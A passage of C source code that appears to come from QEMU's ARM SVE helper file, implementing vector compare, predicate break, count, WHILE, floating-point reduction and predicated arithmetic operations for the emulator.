int64_t, >=) DO_CMP_PPZZ_B(sve_cmphi_ppzz_b, uint8_t, >) DO_CMP_PPZZ_H(sve_cmphi_ppzz_h, uint16_t, >) DO_CMP_PPZZ_S(sve_cmphi_ppzz_s, uint32_t, >) DO_CMP_PPZZ_D(sve_cmphi_ppzz_d, uint64_t, >) DO_CMP_PPZZ_B(sve_cmphs_ppzz_b, uint8_t, >=) DO_CMP_PPZZ_H(sve_cmphs_ppzz_h, uint16_t, >=) DO_CMP_PPZZ_S(sve_cmphs_ppzz_s, uint32_t, >=) DO_CMP_PPZZ_D(sve_cmphs_ppzz_d, uint64_t, >=) #undef DO_CMP_PPZZ_B #undef DO_CMP_PPZZ_H #undef DO_CMP_PPZZ_S #undef DO_CMP_PPZZ_D #undef DO_CMP_PPZZ /* Similar, but the second source is "wide". 
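 * Each 64-bit element of ZM is compared against all of the narrower ZN
 * elements that occupy the same 64-bit lane.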
*/ #define DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ TYPEW mm = *(TYPEW *)((char *)vm + i - 8); \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= nn OP mm; \ } while (i & 7); \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZW_B(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZW_H(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZW_S(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1_4, 0x1111111111111111ull) DO_CMP_PPZW_B(sve_cmpeq_ppzw_b, int8_t, uint64_t, ==) DO_CMP_PPZW_H(sve_cmpeq_ppzw_h, int16_t, uint64_t, ==) DO_CMP_PPZW_S(sve_cmpeq_ppzw_s, int32_t, uint64_t, ==) DO_CMP_PPZW_B(sve_cmpne_ppzw_b, int8_t, uint64_t, !=) DO_CMP_PPZW_H(sve_cmpne_ppzw_h, int16_t, uint64_t, !=) DO_CMP_PPZW_S(sve_cmpne_ppzw_s, int32_t, uint64_t, !=) DO_CMP_PPZW_B(sve_cmpgt_ppzw_b, int8_t, int64_t, >) DO_CMP_PPZW_H(sve_cmpgt_ppzw_h, int16_t, int64_t, >) DO_CMP_PPZW_S(sve_cmpgt_ppzw_s, int32_t, int64_t, >) DO_CMP_PPZW_B(sve_cmpge_ppzw_b, int8_t, int64_t, >=) DO_CMP_PPZW_H(sve_cmpge_ppzw_h, int16_t, int64_t, >=) DO_CMP_PPZW_S(sve_cmpge_ppzw_s, int32_t, int64_t, >=) DO_CMP_PPZW_B(sve_cmphi_ppzw_b, uint8_t, uint64_t, >) DO_CMP_PPZW_H(sve_cmphi_ppzw_h, uint16_t, uint64_t, >) DO_CMP_PPZW_S(sve_cmphi_ppzw_s, uint32_t, uint64_t, >) DO_CMP_PPZW_B(sve_cmphs_ppzw_b, uint8_t, uint64_t, >=) DO_CMP_PPZW_H(sve_cmphs_ppzw_h, uint16_t, uint64_t, >=) DO_CMP_PPZW_S(sve_cmphs_ppzw_s, uint32_t, uint64_t, >=) DO_CMP_PPZW_B(sve_cmplt_ppzw_b, int8_t, int64_t, <) DO_CMP_PPZW_H(sve_cmplt_ppzw_h, int16_t, int64_t, <) DO_CMP_PPZW_S(sve_cmplt_ppzw_s, int32_t, int64_t, <) DO_CMP_PPZW_B(sve_cmple_ppzw_b, int8_t, int64_t, <=) DO_CMP_PPZW_H(sve_cmple_ppzw_h, int16_t, int64_t, <=) DO_CMP_PPZW_S(sve_cmple_ppzw_s, int32_t, int64_t, <=) DO_CMP_PPZW_B(sve_cmplo_ppzw_b, uint8_t, uint64_t, <) DO_CMP_PPZW_H(sve_cmplo_ppzw_h, uint16_t, uint64_t, <) DO_CMP_PPZW_S(sve_cmplo_ppzw_s, uint32_t, uint64_t, <) DO_CMP_PPZW_B(sve_cmpls_ppzw_b, uint8_t, uint64_t, <=) DO_CMP_PPZW_H(sve_cmpls_ppzw_h, uint16_t, uint64_t, <=) DO_CMP_PPZW_S(sve_cmpls_ppzw_s, uint32_t, uint64_t, <=) #undef DO_CMP_PPZW_B #undef DO_CMP_PPZW_H #undef DO_CMP_PPZW_S #undef DO_CMP_PPZW /* Similar, but the second source is immediate. 
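 * The immediate is carried in simd_data(desc) and truncated to the
 * element type before the comparison.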
*/ #define DO_CMP_PPZI(NAME, TYPE, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ TYPE mm = simd_data(desc); \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= nn OP mm; \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZI_B(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZI_H(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZI_S(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1_4, 0x1111111111111111ull) #define DO_CMP_PPZI_D(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, , 0x0101010101010101ull) DO_CMP_PPZI_B(sve_cmpeq_ppzi_b, uint8_t, ==) DO_CMP_PPZI_H(sve_cmpeq_ppzi_h, uint16_t, ==) DO_CMP_PPZI_S(sve_cmpeq_ppzi_s, uint32_t, ==) DO_CMP_PPZI_D(sve_cmpeq_ppzi_d, uint64_t, ==) DO_CMP_PPZI_B(sve_cmpne_ppzi_b, uint8_t, !=) DO_CMP_PPZI_H(sve_cmpne_ppzi_h, uint16_t, !=) DO_CMP_PPZI_S(sve_cmpne_ppzi_s, uint32_t, !=) DO_CMP_PPZI_D(sve_cmpne_ppzi_d, uint64_t, !=) DO_CMP_PPZI_B(sve_cmpgt_ppzi_b, int8_t, >) DO_CMP_PPZI_H(sve_cmpgt_ppzi_h, int16_t, >) DO_CMP_PPZI_S(sve_cmpgt_ppzi_s, int32_t, >) DO_CMP_PPZI_D(sve_cmpgt_ppzi_d, int64_t, >) DO_CMP_PPZI_B(sve_cmpge_ppzi_b, int8_t, >=) DO_CMP_PPZI_H(sve_cmpge_ppzi_h, int16_t, >=) DO_CMP_PPZI_S(sve_cmpge_ppzi_s, int32_t, >=) DO_CMP_PPZI_D(sve_cmpge_ppzi_d, int64_t, >=) DO_CMP_PPZI_B(sve_cmphi_ppzi_b, uint8_t, >) DO_CMP_PPZI_H(sve_cmphi_ppzi_h, uint16_t, >) DO_CMP_PPZI_S(sve_cmphi_ppzi_s, uint32_t, >) DO_CMP_PPZI_D(sve_cmphi_ppzi_d, uint64_t, >) DO_CMP_PPZI_B(sve_cmphs_ppzi_b, uint8_t, >=) DO_CMP_PPZI_H(sve_cmphs_ppzi_h, uint16_t, >=) DO_CMP_PPZI_S(sve_cmphs_ppzi_s, uint32_t, >=) DO_CMP_PPZI_D(sve_cmphs_ppzi_d, uint64_t, >=) DO_CMP_PPZI_B(sve_cmplt_ppzi_b, int8_t, <) DO_CMP_PPZI_H(sve_cmplt_ppzi_h, int16_t, <) DO_CMP_PPZI_S(sve_cmplt_ppzi_s, int32_t, <) DO_CMP_PPZI_D(sve_cmplt_ppzi_d, int64_t, <) DO_CMP_PPZI_B(sve_cmple_ppzi_b, int8_t, <=) DO_CMP_PPZI_H(sve_cmple_ppzi_h, int16_t, <=) DO_CMP_PPZI_S(sve_cmple_ppzi_s, int32_t, <=) DO_CMP_PPZI_D(sve_cmple_ppzi_d, int64_t, <=) DO_CMP_PPZI_B(sve_cmplo_ppzi_b, uint8_t, <) DO_CMP_PPZI_H(sve_cmplo_ppzi_h, uint16_t, <) DO_CMP_PPZI_S(sve_cmplo_ppzi_s, uint32_t, <) DO_CMP_PPZI_D(sve_cmplo_ppzi_d, uint64_t, <) DO_CMP_PPZI_B(sve_cmpls_ppzi_b, uint8_t, <=) DO_CMP_PPZI_H(sve_cmpls_ppzi_h, uint16_t, <=) DO_CMP_PPZI_S(sve_cmpls_ppzi_s, uint32_t, <=) DO_CMP_PPZI_D(sve_cmpls_ppzi_d, uint64_t, <=) #undef DO_CMP_PPZI_B #undef DO_CMP_PPZI_H #undef DO_CMP_PPZI_S #undef DO_CMP_PPZI_D #undef DO_CMP_PPZI /* Similar to the ARM LastActive pseudocode function. */ static bool last_active_pred(void *vd, void *vg, intptr_t oprsz) { intptr_t i; for (i = QEMU_ALIGN_UP(oprsz, 8) - 8; i >= 0; i -= 8) { uint64_t pg = *(uint64_t *)((char *)vg + i); if (pg) { return (pow2floor(pg) & *(uint64_t *)((char *)vd + i)) != 0; } } return 0; } /* Compute a mask into RETB that is true for all G, up to and including * (if after) or excluding (if !after) the first G & N. * Return true if BRK found. 
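 * Worked example (illustrative): with g = 0b1111 and n = 0b0100,
 * AFTER=true yields b = 0b0111 and AFTER=false yields b = 0b0011.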
*/
static bool compute_brk(uint64_t *retb, uint64_t n, uint64_t g,
                        bool brk, bool after)
{
    uint64_t b;

    if (brk) {
        b = 0;
    } else if ((g & n) == 0) {
        /* For all G, no N are set; break not found.  */
        b = g;
    } else {
        /* Break somewhere in N.  Locate it.  */
        b = g & n;            /* guard true, pred true */
#ifdef _MSC_VER
        b = b & (0 - b);      /* first such */
#else
        b = b & -b;           /* first such */
#endif
        if (after) {
            b = b | (b - 1);  /* break after same */
        } else {
            b = b - 1;        /* break before same */
        }
        brk = true;
    }

    *retb = b;
    return brk;
}

/* Compute a zeroing BRK.  */
static void compute_brk_z(uint64_t *d, uint64_t *n, uint64_t *g,
                          intptr_t oprsz, bool after)
{
    bool brk = false;
    intptr_t i;

    for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) {
        uint64_t this_b, this_g = g[i];

        brk = compute_brk(&this_b, n[i], this_g, brk, after);
        d[i] = this_b & this_g;
    }
}

/* Likewise, but also compute flags.  */
static uint32_t compute_brks_z(uint64_t *d, uint64_t *n, uint64_t *g,
                               intptr_t oprsz, bool after)
{
    uint32_t flags = PREDTEST_INIT;
    bool brk = false;
    intptr_t i;

    for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) {
        uint64_t this_b, this_d, this_g = g[i];

        brk = compute_brk(&this_b, n[i], this_g, brk, after);
        d[i] = this_d = this_b & this_g;
        flags = iter_predtest_fwd(this_d, this_g, flags);
    }
    return flags;
}

/* Compute a merging BRK.  */
static void compute_brk_m(uint64_t *d, uint64_t *n, uint64_t *g,
                          intptr_t oprsz, bool after)
{
    bool brk = false;
    intptr_t i;

    for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) {
        uint64_t this_b, this_g = g[i];

        brk = compute_brk(&this_b, n[i], this_g, brk, after);
        d[i] = (this_b & this_g) | (d[i] & ~this_g);
    }
}

/* Likewise, but also compute flags.  */
static uint32_t compute_brks_m(uint64_t *d, uint64_t *n, uint64_t *g,
                               intptr_t oprsz, bool after)
{
    uint32_t flags = PREDTEST_INIT;
    bool brk = false;
    intptr_t i;

    /* Round up, as the sibling functions above do, so that a predicate
     * occupying only part of the final 64-bit word still contributes
     * to the flags.
     */
    for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) {
        uint64_t this_b, this_d = d[i], this_g = g[i];

        brk = compute_brk(&this_b, n[i], this_g, brk, after);
        d[i] = this_d = (this_b & this_g) | (this_d & ~this_g);
        flags = iter_predtest_fwd(this_d, this_g, flags);
    }
    return flags;
}

static uint32_t do_zero(ARMPredicateReg *d, intptr_t oprsz)
{
    /* It is quicker to zero the whole predicate than loop on OPRSZ.
     * The compiler should turn this into 4 64-bit integer stores.
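     * (sizeof(ARMPredicateReg) is 32 bytes: one predicate bit for each
     * byte of the maximal 2048-bit vector.)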
*/ memset(d, 0, sizeof(ARMPredicateReg)); return PREDTEST_INIT; } void HELPER(sve_brkpa)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { compute_brk_z(vd, vm, vg, oprsz, true); } else { do_zero(vd, oprsz); } } uint32_t HELPER(sve_brkpas)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return compute_brks_z(vd, vm, vg, oprsz, true); } else { return do_zero(vd, oprsz); } } void HELPER(sve_brkpb)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { compute_brk_z(vd, vm, vg, oprsz, false); } else { do_zero(vd, oprsz); } } uint32_t HELPER(sve_brkpbs)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return compute_brks_z(vd, vm, vg, oprsz, false); } else { return do_zero(vd, oprsz); } } void HELPER(sve_brka_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_z(vd, vn, vg, oprsz, true); } uint32_t HELPER(sve_brkas_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_z(vd, vn, vg, oprsz, true); } void HELPER(sve_brkb_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_z(vd, vn, vg, oprsz, false); } uint32_t HELPER(sve_brkbs_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_z(vd, vn, vg, oprsz, false); } void HELPER(sve_brka_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_m(vd, vn, vg, oprsz, true); } uint32_t HELPER(sve_brkas_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_m(vd, vn, vg, oprsz, true); } void HELPER(sve_brkb_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_m(vd, vn, vg, oprsz, false); } uint32_t HELPER(sve_brkbs_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_m(vd, vn, vg, oprsz, false); } void HELPER(sve_brkn)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (!last_active_pred(vn, vg, oprsz)) { do_zero(vd, oprsz); } } /* As if PredTest(Ones(PL), D, esz). 
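 * That is, compute the NZCV flags for D as if every element were active;
 * used by BRKNS and WHILE below.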
*/ static uint32_t predtest_ones(ARMPredicateReg *d, intptr_t oprsz, uint64_t esz_mask) { uint32_t flags = PREDTEST_INIT; intptr_t i; for (i = 0; i < oprsz / 8; i++) { flags = iter_predtest_fwd(d->p[i], esz_mask, flags); } if (oprsz & 7) { uint64_t mask = ~(0xffffffffffffffffULL << (8 * (oprsz & 7))); flags = iter_predtest_fwd(d->p[i], esz_mask & mask, flags); } return flags; } uint32_t HELPER(sve_brkns)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return predtest_ones(vd, oprsz, -1); } else { return do_zero(vd, oprsz); } } uint64_t HELPER(sve_cntp)(void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint64_t *n = vn, *g = vg, sum = 0, mask = pred_esz_masks[esz]; intptr_t i; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) { uint64_t t = n[i] & g[i] & mask; sum += ctpop64(t); } return sum; } uint32_t HELPER(sve_while)(void *vd, uint32_t count, uint32_t pred_desc) { uintptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint64_t esz_mask = pred_esz_masks[esz]; ARMPredicateReg *d = vd; uint32_t flags; intptr_t i; /* Begin with a zero predicate register. */ flags = do_zero(d, oprsz); if (count == 0) { return flags; } /* Set all of the requested bits. */ for (i = 0; i < count / 64; ++i) { d->p[i] = esz_mask; } if (count & 63) { d->p[i] = MAKE_64BIT_MASK(0, count & 63) & esz_mask; } return predtest_ones(d, oprsz, esz_mask); } /* Recursive reduction on a function; * C.f. the ARM ARM function ReducePredicated. * * While it would be possible to write this without the DATA temporary, * it is much simpler to process the predicate register this way. * The recursion is bounded to depth 7 (128 fp16 elements), so there's * little to gain with a more complex non-recursive form. */ #define DO_REDUCE(NAME, TYPE, H, FUNC, IDENT) \ static TYPE NAME##_reduce(TYPE *data, float_status *status, uintptr_t n) \ { \ if (n == 1) { \ return *data; \ } else { \ uintptr_t half = n / 2; \ TYPE lo = NAME##_reduce(data, status, half); \ TYPE hi = NAME##_reduce(data + half, status, half); \ return TYPE##_##FUNC(lo, hi, status); \ } \ } \ uint64_t HELPER(NAME)(void *vn, void *vg, void *vs, uint32_t desc) \ { \ uintptr_t i, oprsz = simd_oprsz(desc), maxsz = simd_maxsz(desc); \ TYPE data[sizeof(ARMVectorReg) / sizeof(TYPE)]; \ for (i = 0; i < oprsz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)data + i) = (pg & 1 ? nn : IDENT); \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ for (; i < maxsz; i += sizeof(TYPE)) { \ *(TYPE *)((char *)data + i) = IDENT; \ } \ return NAME##_reduce(data, vs, maxsz / sizeof(TYPE)); \ } DO_REDUCE(sve_faddv_h, float16, H1_2, add, float16_zero) DO_REDUCE(sve_faddv_s, float32, H1_4, add, float32_zero) DO_REDUCE(sve_faddv_d, float64, , add, float64_zero) /* Identity is floatN_default_nan, without the function call. 
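 * 0x7E00, 0x7FC00000 and 0x7FF8000000000000 are the default quiet NaNs
 * for float16, float32 and float64 respectively.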
*/
DO_REDUCE(sve_fminnmv_h, float16, H1_2, minnum, 0x7E00)
DO_REDUCE(sve_fminnmv_s, float32, H1_4, minnum, 0x7FC00000)
DO_REDUCE(sve_fminnmv_d, float64, , minnum, 0x7FF8000000000000ULL)

DO_REDUCE(sve_fmaxnmv_h, float16, H1_2, maxnum, 0x7E00)
DO_REDUCE(sve_fmaxnmv_s, float32, H1_4, maxnum, 0x7FC00000)
DO_REDUCE(sve_fmaxnmv_d, float64, , maxnum, 0x7FF8000000000000ULL)

DO_REDUCE(sve_fminv_h, float16, H1_2, min, float16_infinity)
DO_REDUCE(sve_fminv_s, float32, H1_4, min, float32_infinity)
DO_REDUCE(sve_fminv_d, float64, , min, float64_infinity)

DO_REDUCE(sve_fmaxv_h, float16, H1_2, max, float16_chs(float16_infinity))
DO_REDUCE(sve_fmaxv_s, float32, H1_4, max, float32_chs(float32_infinity))
DO_REDUCE(sve_fmaxv_d, float64, , max, float64_chs(float64_infinity))

#undef DO_REDUCE

uint64_t HELPER(sve_fadda_h)(uint64_t nn, void *vm, void *vg,
                             void *status, uint32_t desc)
{
    intptr_t i = 0, opr_sz = simd_oprsz(desc);
    float16 result = nn;

    do {
        uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3));
        do {
            if (pg & 1) {
                float16 mm = *(float16 *)((char *)vm + H1_2(i));
                result = float16_add(result, mm, status);
            }
            i += sizeof(float16), pg >>= sizeof(float16);
        } while (i & 15);
    } while (i < opr_sz);

    return result;
}

uint64_t HELPER(sve_fadda_s)(uint64_t nn, void *vm, void *vg,
                             void *status, uint32_t desc)
{
    intptr_t i = 0, opr_sz = simd_oprsz(desc);
    float32 result = nn;

    do {
        uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3));
        do {
            if (pg & 1) {
                /* Use the 4-byte accessor for 4-byte elements, matching
                 * the other float32 helpers in this file.
                 */
                float32 mm = *(float32 *)((char *)vm + H1_4(i));
                result = float32_add(result, mm, status);
            }
            i += sizeof(float32), pg >>= sizeof(float32);
        } while (i & 15);
    } while (i < opr_sz);

    return result;
}

uint64_t HELPER(sve_fadda_d)(uint64_t nn, void *vm, void *vg,
                             void *status, uint32_t desc)
{
    intptr_t i = 0, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *m = vm;
    uint8_t *pg = vg;

    for (i = 0; i < opr_sz; i++) {
        if (pg[H1(i)] & 1) {
            nn = float64_add(nn, m[i], status);
        }
    }

    return nn;
}

/* Fully general three-operand expander, controlled by a predicate,
 * with the extra float_status parameter.
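 * The loop walks backward one 64-bit predicate word at a time; each
 * predicate bit covers one vector byte, so bit (i & 63) of PG guards
 * the element at byte offset i.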
*/ #define DO_ZPZZ_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm, status); \ } \ } while (i & 63); \ } while (i != 0); \ } DO_ZPZZ_FP(sve_fadd_h, uint16_t, H1_2, float16_add) DO_ZPZZ_FP(sve_fadd_s, uint32_t, H1_4, float32_add) DO_ZPZZ_FP(sve_fadd_d, uint64_t, , float64_add) DO_ZPZZ_FP(sve_fsub_h, uint16_t, H1_2, float16_sub) DO_ZPZZ_FP(sve_fsub_s, uint32_t, H1_4, float32_sub) DO_ZPZZ_FP(sve_fsub_d, uint64_t, , float64_sub) DO_ZPZZ_FP(sve_fmul_h, uint16_t, H1_2, float16_mul) DO_ZPZZ_FP(sve_fmul_s, uint32_t, H1_4, float32_mul) DO_ZPZZ_FP(sve_fmul_d, uint64_t, , float64_mul) DO_ZPZZ_FP(sve_fdiv_h, uint16_t, H1_2, float16_div) DO_ZPZZ_FP(sve_fdiv_s, uint32_t, H1_4, float32_div) DO_ZPZZ_FP(sve_fdiv_d, uint64_t, , float64_div) DO_ZPZZ_FP(sve_fmin_h, uint16_t, H1_2, float16_min) DO_ZPZZ_FP(sve_fmin_s, uint32_t, H1_4, float32_min) DO_ZPZZ_FP(sve_fmin_d, uint64_t, , float64_min) DO_ZPZZ_FP(sve_fmax_h, uint16_t, H1_2, float16_max) DO_ZPZZ_FP(sve_fmax_s, uint32_t, H1_4, float32_max) DO_ZPZZ_FP(sve_fmax_d, uint64_t, , float64_max) DO_ZPZZ_FP(sve_fminnum_h, uint16_t, H1_2, float16_minnum) DO_ZPZZ_FP(sve_fminnum_s, uint32_t, H1_4, float32_minnum) DO_ZPZZ_FP(sve_fminnum_d, uint64_t, , float64_minnum) DO_ZPZZ_FP(sve_fmaxnum_h, uint16_t, H1_2, float16_maxnum) DO_ZPZZ_FP(sve_fmaxnum_s, uint32_t, H1_4, float32_maxnum) DO_ZPZZ_FP(sve_fmaxnum_d, uint64_t, , float64_maxnum) static inline float16 abd_h(float16 a, float16 b, float_status *s) { return float16_abs(float16_sub(a, b, s)); } static inline float32 abd_s(float32 a, float32 b, float_status *s) { return float32_abs(float32_sub(a, b, s)); } static inline float64 abd_d(float64 a, float64 b, float_status *s) { return float64_abs(float64_sub(a, b, s)); } DO_ZPZZ_FP(sve_fabd_h, uint16_t, H1_2, abd_h) DO_ZPZZ_FP(sve_fabd_s, uint32_t, H1_4, abd_s) DO_ZPZZ_FP(sve_fabd_d, uint64_t, , abd_d) static inline float64 scalbn_d(float64 a, int64_t b, float_status *s) { int b_int = MIN(MAX(b, INT_MIN), INT_MAX); return float64_scalbn(a, b_int, s); } DO_ZPZZ_FP(sve_fscalbn_h, int16_t, H1_2, float16_scalbn) DO_ZPZZ_FP(sve_fscalbn_s, int32_t, H1_4, float32_scalbn) DO_ZPZZ_FP(sve_fscalbn_d, int64_t, , scalbn_d) DO_ZPZZ_FP(sve_fmulx_h, uint16_t, H1_2, helper_advsimd_mulxh) DO_ZPZZ_FP(sve_fmulx_s, uint32_t, H1_4, helper_vfp_mulxs) DO_ZPZZ_FP(sve_fmulx_d, uint64_t, , helper_vfp_mulxd) #undef DO_ZPZZ_FP /* Three-operand expander, with one scalar operand, controlled by * a predicate, with the extra float_status parameter. 
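 * The scalar is converted to the element type once, outside the loop;
 * e.g. sve_fadds_h adds the same float16 value to every active element.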
*/ #define DO_ZPZS_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint64_t scalar, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ TYPE mm = scalar; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm, status); \ } \ } while (i & 63); \ } while (i != 0); \ } DO_ZPZS_FP(sve_fadds_h, float16, H1_2, float16_add) DO_ZPZS_FP(sve_fadds_s, float32, H1_4, float32_add) DO_ZPZS_FP(sve_fadds_d, float64, , float64_add) DO_ZPZS_FP(sve_fsubs_h, float16, H1_2, float16_sub) DO_ZPZS_FP(sve_fsubs_s, float32, H1_4, float32_sub) DO_ZPZS_FP(sve_fsubs_d, float64, , float64_sub) DO_ZPZS_FP(sve_fmuls_h, float16, H1_2, float16_mul) DO_ZPZS_FP(sve_fmuls_s, float32, H1_4, float32_mul) DO_ZPZS_FP(sve_fmuls_d, float64, , float64_mul) static inline float16 subr_h(float16 a, float16 b, float_status *s) { return float16_sub(b, a, s); } static inline float32 subr_s(float32 a, float32 b, float_status *s) { return float32_sub(b, a, s); } static inline float64 subr_d(float64 a, float64 b, float_status *s) { return float64_sub(b, a, s); } DO_ZPZS_FP(sve_fsubrs_h, float16, H1_2, subr_h) DO_ZPZS_FP(sve_fsubrs_s, float32, H1_4, subr_s) DO_ZPZS_FP(sve_fsubrs_d, float64, , subr_d) DO_ZPZS_FP(sve_fmaxnms_h, float16, H1_2, float16_maxnum) DO_ZPZS_FP(sve_fmaxnms_s, float32, H1_4, float32_maxnum) DO_ZPZS_FP(sve_fmaxnms_d, float64, , float64_maxnum) DO_ZPZS_FP(sve_fminnms_h, float16, H1_2, float16_minnum) DO_ZPZS_FP(sve_fminnms_s, float32, H1_4, float32_minnum) DO_ZPZS_FP(sve_fminnms_d, float64, , float64_minnum) DO_ZPZS_FP(sve_fmaxs_h, float16, H1_2, float16_max) DO_ZPZS_FP(sve_fmaxs_s, float32, H1_4, float32_max) DO_ZPZS_FP(sve_fmaxs_d, float64, , float64_max) DO_ZPZS_FP(sve_fmins_h, float16, H1_2, float16_min) DO_ZPZS_FP(sve_fmins_s, float32, H1_4, float32_min) DO_ZPZS_FP(sve_fmins_d, float64, , float64_min) /* Fully general two-operand expander, controlled by a predicate, * With the extra float_status parameter. */ #define DO_ZPZ_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, status); \ } \ } while (i & 63); \ } while (i != 0); \ } /* SVE fp16 conversions always use IEEE mode. Like AdvSIMD, they ignore * FZ16. When converting from fp16, this affects flushing input denormals; * when converting to fp16, this affects flushing output denormals. 
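 * Hence the helpers below save, clear and restore the relevant
 * flush-to-zero flag around each conversion.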
